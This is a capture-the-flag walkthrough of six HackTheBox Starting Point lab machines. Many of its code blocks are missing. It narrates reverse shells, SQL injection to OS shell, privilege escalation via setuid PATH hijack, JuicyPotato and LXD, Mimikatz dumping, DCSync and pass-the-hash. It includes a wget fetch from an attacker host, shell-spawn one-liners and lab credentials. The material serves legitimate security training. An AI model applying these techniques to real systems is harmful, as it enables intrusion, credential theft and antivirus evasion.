Starting Point on HackTheBox (2020)
INTRODUCTION
This path is composed of 6 boxes in a way that later boxes use information (like credentials) gathered from the previous ones.
▶ ARCHTYPE
◌ About
=============
This is a Windows box where you can learn how enumeration can lead to RCE via SQL server queries.
- Machine : Archetype
- Ip: 10.10.10.27
◌ Enumeration
=============
nmap -sC -sV 10.10.10.27
Ports 445 and 1433 are open, which are associated with file sharing (SMB) and SQL Server.
|
|
It is worth checking to see if anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list available shares.
|
|
It seems there is a share called backups. Let’s attempt to access it and see what’s inside.
|
|
There is a dtsConfig file, which is a config file used with SSIS. Let’s see the code
|
|
Checking the file we see:
-
The password: M3g4c0rp123
-
The user ID : ARCHETYPE\sql_svc
|
|
◌ Foothold
==========
We see that it contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc.
Let’s try connecting to the SQL Server using Impacket’s mssqlclient.py with the above credentials (pwd:M3g4c0rp123 )
|
|
We can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges.
This will allow us to enable xp_cmdshell and gain RCE(remote code execution) on the host. Let’s attempt this, by inputting the commands below.
|
|
The whoami command output reveals that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc. However, this account doesn’t seem to have administrative privileges on the host.
|
|
Let’s attempt to get a proper shell, and proceed to further enumerate the system. We can save the PowerShell reverse shell below as shell.ps1.
|
|
Next, stand up a mini webserver in order to host the file. We can use Python.
|
|
Below the python mini webserver started:
After standing up a netcat listener on port 443, we can use ufw to allow the call backs on port 80 and 443 to our machine.
|
|
Below the netcat listener started:
We can now issue the command to download and execute the reverse shell through xp_cmdshell. (10.10.14.16 attacking machine)
|
|
We can see from our mini webserver that a file has been downloaded
A shell is received as sql_svc, and we can get the user.txt on their desktop.
Using Tmux, that’s all in one window:
◌ Privilege Escalation
======================
As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. We can use the type command to access the PowerShell history file.
|
|
From the ConsoleHost_history.txt we can see the administrator password:
|
|
This also reveals that the backups drive has been mapped using the local administrator credentials. We can use Impacket’s psexec.py to gain a privileged shell.
|
|
Once gained the privileged shell, we can now search for "root.txt"
▶ OOPSIE
◌ About
=============
This box features debugging session and MySQL enumeration
- Machine : Oopsie
- Ip: 10.10.10.28
◌ Enumeration
=============
nmap -sC -sV 10.10.10.28
Running a simple Nmap scan reveals two open ports running, for SSH and Apache respectively.
|
|
Nmap reveals reveals that SSH and Apache are available on their default ports. Let’s check out the website.
It seems to be a website for the electric vehicle manufacturer MegaCorp. Scrolling down, we note that a reference is made to logging in.
We can’t see anything else of interest, so let’s send the request to a web proxy such as Burp, so we can examine the website in more detail.
We point the browser to the Burp proxy at 127.0.0.1:8080, refresh the page, and forward the request.
On the Target tab, we notice that Burp has passively spidered the website while processing the request.
We can see the url “/cdn-cgi/login”.
We could have also simply used our browser; in Firefox we could have inspected the web page, and we could have found the same url under the Network Monitor tab:
}
We could have just used “Edit and Resend”
Just modify the URL into “http://10.10.10.28/cdn-cgi/login/”
And click “Send”
And the link to the login page appear in our list:
Now just open it in a “New Tab”
We confirm that this is a login page. Let’s try to reuse the password MEGACORP_4dm1n!! from the previously compromised machine, with common usernames such as administrator or admin .
This is successful, and we gain access to the web portal, which contains additional functionality.
However, it seems the developer has implemented tiers of administration,
and the Uploads page is further restricted to the super admin user.
Let’s examine the URL: “http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=”
We can see that for id=1, we will have user admin
If we pick Id=4, the user is now john
Let’s examine the page in Burp. We refresh on the Accounts page, which displays the user id for our current user, and intercept the request. We notice what seems to be a custom cookie implementation, comprising of the user value and role. We also notice the id parameter, which for our current admin user is 1.
This shows that it might be possible to brute force the id values, and display the user value for another user, such as the super admin account.
We can do this using by trying a series of id values, we will use Burp’s Intruder module.
We press Clear to remove the pre-populated payload positions
We now select the Id value (1),
We click Add.
Next, click on the Payloads tab.
We can generate a sequential list of 1-100 using a simple bash script
|
|
…..
Paste the output into the Payloads box.
Next we move to “Options” tab
We ensure that Follow Redirections is set to “Always”, and select the option to “Process cookies in redirections”.
Let’s click on the Target tab, and then click “Start attack”.
We sort responses by Length, and view the results.
A few of a responses have a different length, and we proceed to examine them. The super admin account is visible, and corresponding user value is identified(86575).
Let’s try to access the Uploads page again
Let’s substitute the user value (34322) with the super admins value (86575).
Let’s click on “Forward” and see what the response into the browser (let’s disable the proxy first)
Inspecting cookies, let’s see again the upload page:
We can see that the user’s Value is “34322” with role “admin”
Let’s try changing the users’ value into “86575” an see what happens the we refresh the page
We do now have access as super admin:
◌ Foothold
===============
Let’s check if the developer forgot to implement user input validation, and so we should test if we can upload other files, such as a PHP webshell.
Let’s locate the “php-reverse-shell.php” file.
Let’s save this file as “check.php”
Let’s now customize the file “check.php” file with our IP address and the port values
Page reports that the upload of the “check.php” file was successful
We don’t know where the reverse shell was uploaded to. Let’s enumerate the web server for common directories using a the dirsearch tool.
From the output we can see that tool identified the uploads folder
We can set up our listener
Then we can trigger a reverse shell using the curl command.
Below a a shell as www-data and proceed to upgrade it.
Let’s upgrade the reverse shell as follow:
|
|
◌ Lateral Movement
==================
The website records are probably retrieved from a database, so it’s a good idea to check for database connection information.
Let’s check for any db file
And
Let check the **/var/www/html/cdn-cgi/login/db.php. **
From the php.net manual page “https://www.php.net/manual/en/function.mysqli-connect.php”, we see how mysqli_connect function works:
|
|
Indeed, db.php does contain credentials:
-
DB_USERNAME: robert
-
DB_PASSWORD:M3g4C0rpUs3r!
We can su robert to move laterally.
◌ Privilege Escalation
======================
The id command reveals that robert is a member of the bugracker group.
We can enumerate the filesystem to see if this group has any special acces
|
|
|
|
We could have use also the following command to concatenate the two commands:
|
|
▹ Setuid
We can see that there is a special permission on the file “s”.
That is the “setuid” bit, which tells the OS to execute that program with the userid of its owner.This is typically used with files owned by root to allow normal users to execute them as root with no external tools (such as sudo).
SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.
SGID is a special file permission that also applies to executable files and enables other users to inherit the effective GID of file group owner. Likewise, rather than the usual x which represents execute permissions, you will see an s (to indicate SGID) special permission for group user.
Let’s run the bugtracker binary and see what it does.
It seems to output a report based on the ID value provided. Let’s use strings to see how it does this.
We see that it calls the “cat” binary using this relative path instead of the absolute path.
Let have a look to current $PATH
|
|
By creating a malicious cat, and modifying the path to include the current working directory, we should be able to abuse this misconfiguration, and escalate our privileges to root.
Let’s add the “tmp” directory to PATH
|
|
Then we move into the tmp folder:
|
|
Let’ create a malicious cat,
|
|
Let’s make it executable.
|
|
Now, after making our “malicious” cat executable if we search for the cat executable with the “which” command we will see:
PATH is an environmental variable in Linux and other Unix-like operating systems that tells the shell which directories to search for executable files (i.e., ready-to-run programs) in response to commands issued by a user.
The first “cat” command to be executed will be “/tmp/cat”, so by running the bugtracker nìbinary we will have access to a root shell.
◌ Post Exploitation
===================
Inside root’s folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser / mc@F1l3ZilL4 visible in plain text.
{width=“5.125in” height=“1.9791666666666667in”}
▶ VACCINE
◌ About
This box features working with MD5 hashes and escaping user context to root by exploiting sudoer misconfiguration
- Machine : Vaccine
- Ip: 10.10.10.46
◌ Enumeration
======================
nmap -sC -sV 10.10.10.46
Running a simple Nmap scan reveals three open ports running, for FTP, SSH and Apache respectively.
|
|
The credentials ftpuser / mc@F1l3ZilL4 can be used to login to the FTP server.
ftp 10.10.10.46
|
|
Let’s see what is in there:
|
|
A file named backup.zip is found in the folder. Let get the *.zip file:
|
|
Extraction of the archive fails as it’s password protected. The password can be cracked using zip2john, JohntheRipper and rockyou.txt.
The zip2john tool will be used to process the input ZIP files into an hash format suitable for use with JohntheRipper
|
|
The rockyou.txt file (with the passwords) is located here :
|
|
To extract the rockyou.txt.gz file we use the gunzip command:
-
gunzip /usr/share/wordlists/rockyou.txt.gz
Now it is possible to use the JohntheRipper tool as sown below:
|
|
As we can see, the password for the backup.zip file is found to be 741852963
Extracting it’s contents using the password reveals a PHP file and a CSS file.
|
|
Inspecting the PHP source code, we find a login check.
|
|
The input password is hashed into a MD5 hash: 2cb42f8734ea607eefed3b70af13bbd3. T
This hash can be easily cracked using an online rainbow table such as crackstation.
{width=“5.7659722222222225in”
height=“3.2916666666666665in”}
The result is : qwerty789
◌ Foothold
======================
Browsing to port 80, we can see a login page for MegaCorp.
{width=“6.147222222222222in”
height=“2.2847222222222223in”}
The credentials admin / qwerty789 can be used to login.
{width=“6.0784722222222225in”
height=“2.8097222222222222in”}
The page is found to host a Car Catalogue, and contains functionality to search for products.
{width=“5.572916666666667in”
height=“0.4479166666666667in”}
Searching for example fo the term “a”, results in the following request.
http://10.10.10.46/dashboard.php?search=a
{width=“5.760416666666667in” height=“3.0875in”}
The page takes in a GET request with the parameter search. This URL is supplied to sqlmap, in order to test for SQL injection vulnerabilities. The website uses cookies, which can be specified using –cookie.
Right-click the page and select Inspect Element. Click the Storage tab and copy the PHP Session ID.
{width=“5.759027777777778in” height=“1.4625in”}
{width=“3.1145833333333335in” height=“0.625in”}
WE see the PHPSESSID value is :"gub9n3ugpgc5obsre8jkv8tq3m"
We can construct the Sqlmap query as follows:
**sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ –cookie="**PHPSESSID=gub9n3ugpgc5obsre8jkv8tq3m"
Sqlmap found the page to be vulnerable to multiple injections, and identified the backend DBMS to be PostgreSQL.
Getting code execution in postgres is trivial using the –os-shell command.
|
|
{width=“5.759027777777778in”
height=“1.4895833333333333in”}
◌ Privilege Escalation
======================
This can be used to execute a bash reverse shell.
|
|
{width=“5.7659722222222225in” height=“1.9375in”}
Let’s upgrade to a tty shell and continue enumeration.
|
|
Let’s have a look to the source code of dashboard.php in /var/www/html.
The code reveals the postgres password to be: P@s5w0rd!
{width=“5.7659722222222225in” height=“0.375in”}
This password can be used to view the user’s sudo privileges.
{width=“5.7652777777777775in”
height=“1.1513888888888888in”}
The user is allowed to edit the configuration /etc/postgresql/11/main/pg_hba.conf using vi. This can be leveraged to gain a root shell and access root.txt.
Once opened the file in “Vi” editor with sudo, we can spawn a TTY shell from within vi by just typing:
-
:!0bash
-
:set shell=**/bin/**bash:shell
-
:!/bin/bash
{width=“5.764583333333333in”
height=“6.316666666666666in”}
As we can see, now we have a TTY as root.
{width=“5.763194444444444in” height=“4.34375in”}
▶ SHIELD
◌ About
======================
This box features only a root flag. Don’t waste your time on finding the user.txt - until this is corrected by the Dev Team. I’ve raised this issue already, so this article will be updated accordingly when status is changed. UPDATE: Apparently this is solved right now and information “No Flag” for user flag is shown correctly both for Shield and Vaccine.
- Machine : Shield
- Ip: 10.10.10.29
◌ Enumeration
======================
sudo nmap -sC -sV 10.10.10.29
From the Nmap output, we find that IIS and MySQL are running on their default ports. IIS (Internet Information Services) is a Web Server created by Microsoft.
|
|
Let’s navigate to port 80 using a browser.
{width=“5.78125in”
height=“2.4034722222222222in”}
We see the default IIS starting page.
Let’s use GoBuster to scan for any sub-directories or files that are hosted on the server.
We do found the “/wordpress” folder.
WordPress is a Content Management System (CMS) that can be used to quickly create websites and blogs.
Let’s do another search using “dirsearch” and pointing directly to that folder
We do see some interesting folder and files.
Since we have already acquired the password P@s5w0rd!, we can try to login to the WordPress site.
We navigate to http://10.10.10.29/wordpress/wp-login.php and try to guess the username.
Some common usernames are admin or administrator.
The combination admin : P@s5w0rd! is successful and we gain administrative access to the site.
◌ Foothold
====================
The administrative access can be leveraged through the msfmodule “exploit/ unix/webapp/wp_admin_shell_upload”, to get a meterpreter shell on the system. Let’s follow the following commands in order to get a session:
|
|
Now that we got a meterpreter shell, we can use netcat (nc.exe) tp get a more stable shell.
So let’s locate the binary.
Let’s copy nc.exe into our “Tools” directory
From within the meterpeter session, let’s move to oyr local Tools directory
We can use the lcd command ( lcd stands for “Local Change Directory”, which we use to navigate to the local folder where nc.exe is located.):
So, lwt’s move to the “/home/kali/HTB/StartingPoint/Tools” folder where the “nc.exe” binary is located
We then navigate to a writeable directory on the server (in our case C:/inetpub/wwwroot/wordpress/wp-content/uploads) and upload netcat.
The command to use is the “upload” command: upload nc.exe
We can see now the nc.exe program in the “upload” folder
◌ Using Netcat
On another terminal we can now launch a listener
|
|
Next, we can execute the following command into the meterpreter session
|
|
And we get a netcat shell:
◌ Privilege Escalation
======================
Running the “sysinfo” command on the meterpreter session, we notice that this is a Windows Server 2016 OS, which is vulnerable to the Rotten Potato exploit.
Let’s download the “JuicyPotato.exe” binary frome here : https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Let’s save the binary into our “Tools” folder
NOTE: Sometimes browser does not allow the download
In this situation we can use the following command:
|
|
Then with the lcd command we move to the “Tools” folder from the meterpreter shell and we procede with the upload of the “JuicyPotato.exe” into the “uploads” folder.
NOTE: We will have to rename the Juicy Potato executable to something else, otherwise it will be picked up by Windows Defender.
From the meterpeter session we can use this command:
|
|
From the reverse shell on a Windows Machine we can use this command:
|
|
From our shell, we can create a batch file that will be executed by the exploit, and return a SYSTEM shell. Let’s add the following contents to shell.bat:
|
|
Let’s start, from another terminal, another netcat listener:
Next, we execute the netcat shell using the JuicyPotato binary(js.exe):
|
|
NOTE: if our payload is not working, we can use another CLSID
|
|
Now on the listener terminal we have a shell as “nt authority\system”
And we can have access to the “root.txt” file
◌ Post Exploitation
===================
We can now try to dump cache password. using a tool named “Mimikatz”
The 64 bit versione is the one we need
We use the meterpeter session to upload the “mimikatz.exe” file:
As a “nt authority\system” we execute mimikatz and use the sekurlsa command to extract logon passwords
|
|
|
|
And we find the password “Password1234!” for domain user “Sandra”.
▶ PATHFINDER
- Machine : Pathfinder
- Ip: 10.10.10.29
◌ Enumeration
=============
We are going to use “masscan” this time
|
|
Port 88 is typically associated with Kerberos
Port 389 with LDAP, which indicates that this is a Domain Controller.
We note that WinRM is enabled on port 5985.
We can attempt to enumerate Active Directory using the credentials we obtained in a previous machine:
-
sandra
-
Password1234!
We can achieve this using a python bloodhound injester, but first, we need to install neo4j and BloodHound.
|
|
Let’s install now the python bloodhound injester, tnat can be found at here:
It can also be installed using pip:
|
|
Let’s run the command
|
|
The BloodHound injester created some json files ready to be imported into BloodHound.
Next, we need to configure the neo4j service. We can accomplish this by running the following command
|
|
You will be then prompted to insert or change(at first login) your password.
If connected we will see
Next, we start BloodHound
|
|
Ensure you have a connection to the database; indicated by a ✔️ symbol at the top of the three input fields. The default username is neo4j with the password previously set.
Below before importing the .json files:
Opening BloodHound, we can drag and drop the .json files, and BloodHound will begin to analyze the data.
We can select various queries, of which some very useful ones are Shortest Paths to High value Targets and Find Principles with DCSync Rights.
While the latter query returns this:
Let’s select the domain “MEGACORP.LOCAL”
The query will generate the below graph for domain “MEGACORP.LOCAL”
We can see that the svc_bes has GetChangesAll privileges to the domain. This means that the account has the ability to request replication data from the domain controller, and gain sensitive information such as user hashes.
◌ Lateral Movement
=====================
It’s worth checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket’s GetNPUsers.
|
|
Below out TGT ticket
|
|
Once obtained the TGT ticket for the svc_bes, let’s save it into a file called hash(it could be any name).
We could have also used:
|
|
We will use JTR in conjunction with rockyou.txt to obtain the plaintext password (but we could have also used Hashcat)
|
|
Below the password for svc_bes : Sheffield19
It is now possible to access the server as svc_bes using **WinRM **
(With the nmap scan we noted that WinRM was enabled on port 5985)
Let’s install “evil-winrm” (Installation directly as ruby gem)
|
|
And run it against 10.10.10.30 using “svc_bes” credentials
|
|
◌ Privilege Escalation
=========================
In order to leverage the GetChangesAll permission, we can use Impacket’s secretsdump.py to perform a DCSync attack and dump the NTLM hashes of all domain users.
|
|
We can see the default domain Administrator NTLM hash
We can use this in a PTH attack (Pass-the-Hash attack) to gain elevated access to the system.
For this, we can use Impacket’s psexec.py as follow:
|
|
For <NTML hash>:<NTLM hash> we will use:
-
NTML hash –> aad3b435b51404eeaad3b435b51404ee
-
NTLM hash –> 8a4b77d52b1845bfe949ed1b9643bb18
|
|
An as we can see we gain elevated access to the system
▶ INCLUDED (Linux)
- Machine : Included (Linux)
- Ip: 10.10.10.55
◌ Enumeration
=============
|
|
|
|
From a TCP scan we found only port 80 (Apache httpd 2.4.29 ((Ubuntu)))
We can navigate to the website in a browser.
Let’s try scanning the UDP ports
|
|
|
|
The UDP scan found port 69 to be open, which hosts the TFTP service.
TFTP or “Trivial File Transfer Protocol”, is similar to FTP but much simpler. It provides functionality only for uploading or downloading files from a server.
Let’s see if we can connect to TFTP and upload a file.
We first create a file named “test.txt”
We connect and confirm that we can upload files.
◌ LFI(Local File Inclusion)
===========================
Let’s check if the URL of the website “http://10.10.10.55/?file=index.php" is vulnerable to Local File Inclusion.
We can test by changing the URL to the following:
|
|
This is successful, and passwd contents are returned by the server.
◌ Foothold
=============
We can try upload and execute a “PHP reverse shell” by combining the LFI vulnerability with the TFTP service. This happens due to the inclusion of the PHP code by the vulnerable page, which results in it’s execution.
First we have to modify the PHP reverse shell which cane be taken from here if not present on our kali system.
Let’s copy the file into our folder with name “rev.php”
As usual, let’s modify the code for our needs:
Once changed the IP address and the port, we upload our PHP reverse shell.
Let’s start a netcat listener before navigating to the shell.
Next, we can use the LFI to access the reverse shell.
- The default TFTP root folder is /var/lib/tftpboot.
Navigating to http://10.10.10.55/?file=../../../../var/lib/tftpboot/rev.php, due to the inclusion of the PHP code by the vulnerable page, will results in the PHP reverse shell execution.
We could have also used the “curl” tool as follow:
|
|
And we get the reverse shell:
The low privilged www-data user isn’t allowed to read user files, let’s update the shell as www-data
|
|
Below some other ways to spwan a TTY shell. The top 3 would be most successful in general for spawning from the command line.
-
python3 -c ‘import pty; pty.spawn("/bin/sh")'
-
echo os.system('/bin/bash’)
-
/bin/sh -i
-
perl —e ‘exec “/bin/sh”;'
-
perl: exec “/bin/sh”;
-
ruby: exec “/bin/sh”
-
lua: os.execute('/bin/sh’)
-
(From within IRB) exec “/bin/sh”
-
(From within vi) :!bash
-
(From within vi) :set shell=/bin/bash:shell
-
(From within nmap) !sh
Many of these will also allow you to escape jail shells
From the etc/passwd file we see that we can see there is a user “mike”
We can “su” to the user mike with the password founded on the previous machine (Pathfinder).
As shown below, once updated the shell as www-data, we can logged in as mike.
At location /home/mike we can find the user.txt file
We also notice that mike is a lxd member
The LXD group is a high-privileged linux group; a member of the local “lxd” group can instantly escalate the privileges to root on the host operating system.
▹ LXD
◌ Introduction to LXD and LXC
This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package
LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.
One of them is to use the LXD API to mount the host’s root filesystem into a container which is going to use in this post. This gives a low-privilege user root access to the host filesystem.
◌ Linux Container (LXC)
*** Are often considered as a lightweight*** Virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel.
◌ Linux daemon (LXD)
is the lightervisor, or lightweight container Hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before. It uses the stable LXC API to do all the container management behind the scene, adding the REST API on top and providing a much simpler, more consistent user experience.
◌ Container Technology
Container technology comes from the container, is a procedure to assemble an application so that it can be run, with its requirements, in isolation from other processes container applications with names like Docker and Apache Mesos ‘ popular choices have been introduced by major public cloud vendors including Amazon Web Services, Microsoft Azure and Google Cloud Platforms.
◌ LXD Privilege Escalation
==========================
Privilege escalation through lxd requires the access of local account.
Note: the most important condition is that the user should be a member of lxd group (in our case is 108, but it could have been any other number)
First, we have create an image for lxd, thus we first need to clone on our local machine the following build-alpine repository
|
|
We move into the lxd-alpine-builder
And execute the “./build-alpine” file
On running the above command, a “tar.gz” file is created. Now we have to transferred this “tar.gz” file from the attacker machine to the host (victim) machine.
We can use the following python command to start a local webserver
|
|
On the host(victim) machine we can download the file “tar.gz” using the command “wget” as follow:
-
First we move into the /tmp folder
-
Then we run the command
wget 10.10.14.3:8888/alpine-v3.10-x86_64-20191008_1227.tar.gz
We will see that our file has been transferred/downloaded.
Next, we run the following commands to get the root.
First we built the image and can be added as an image to LXD as follows:
|
|
In the above command we used “rootimage” as ALIAS but it could ahve been any name
We can use the list command to check the list of images
|
|
The command above will let us have access to the entire filesystem from within the container.
|
|
The next set of commands start the container and drop us into a shell (as root) on it.
|
|
We can now navigate to /mnt/root/root/ and read root.txt along with login.sql, which reveals credentials.
The login.sql file reveals some credentials
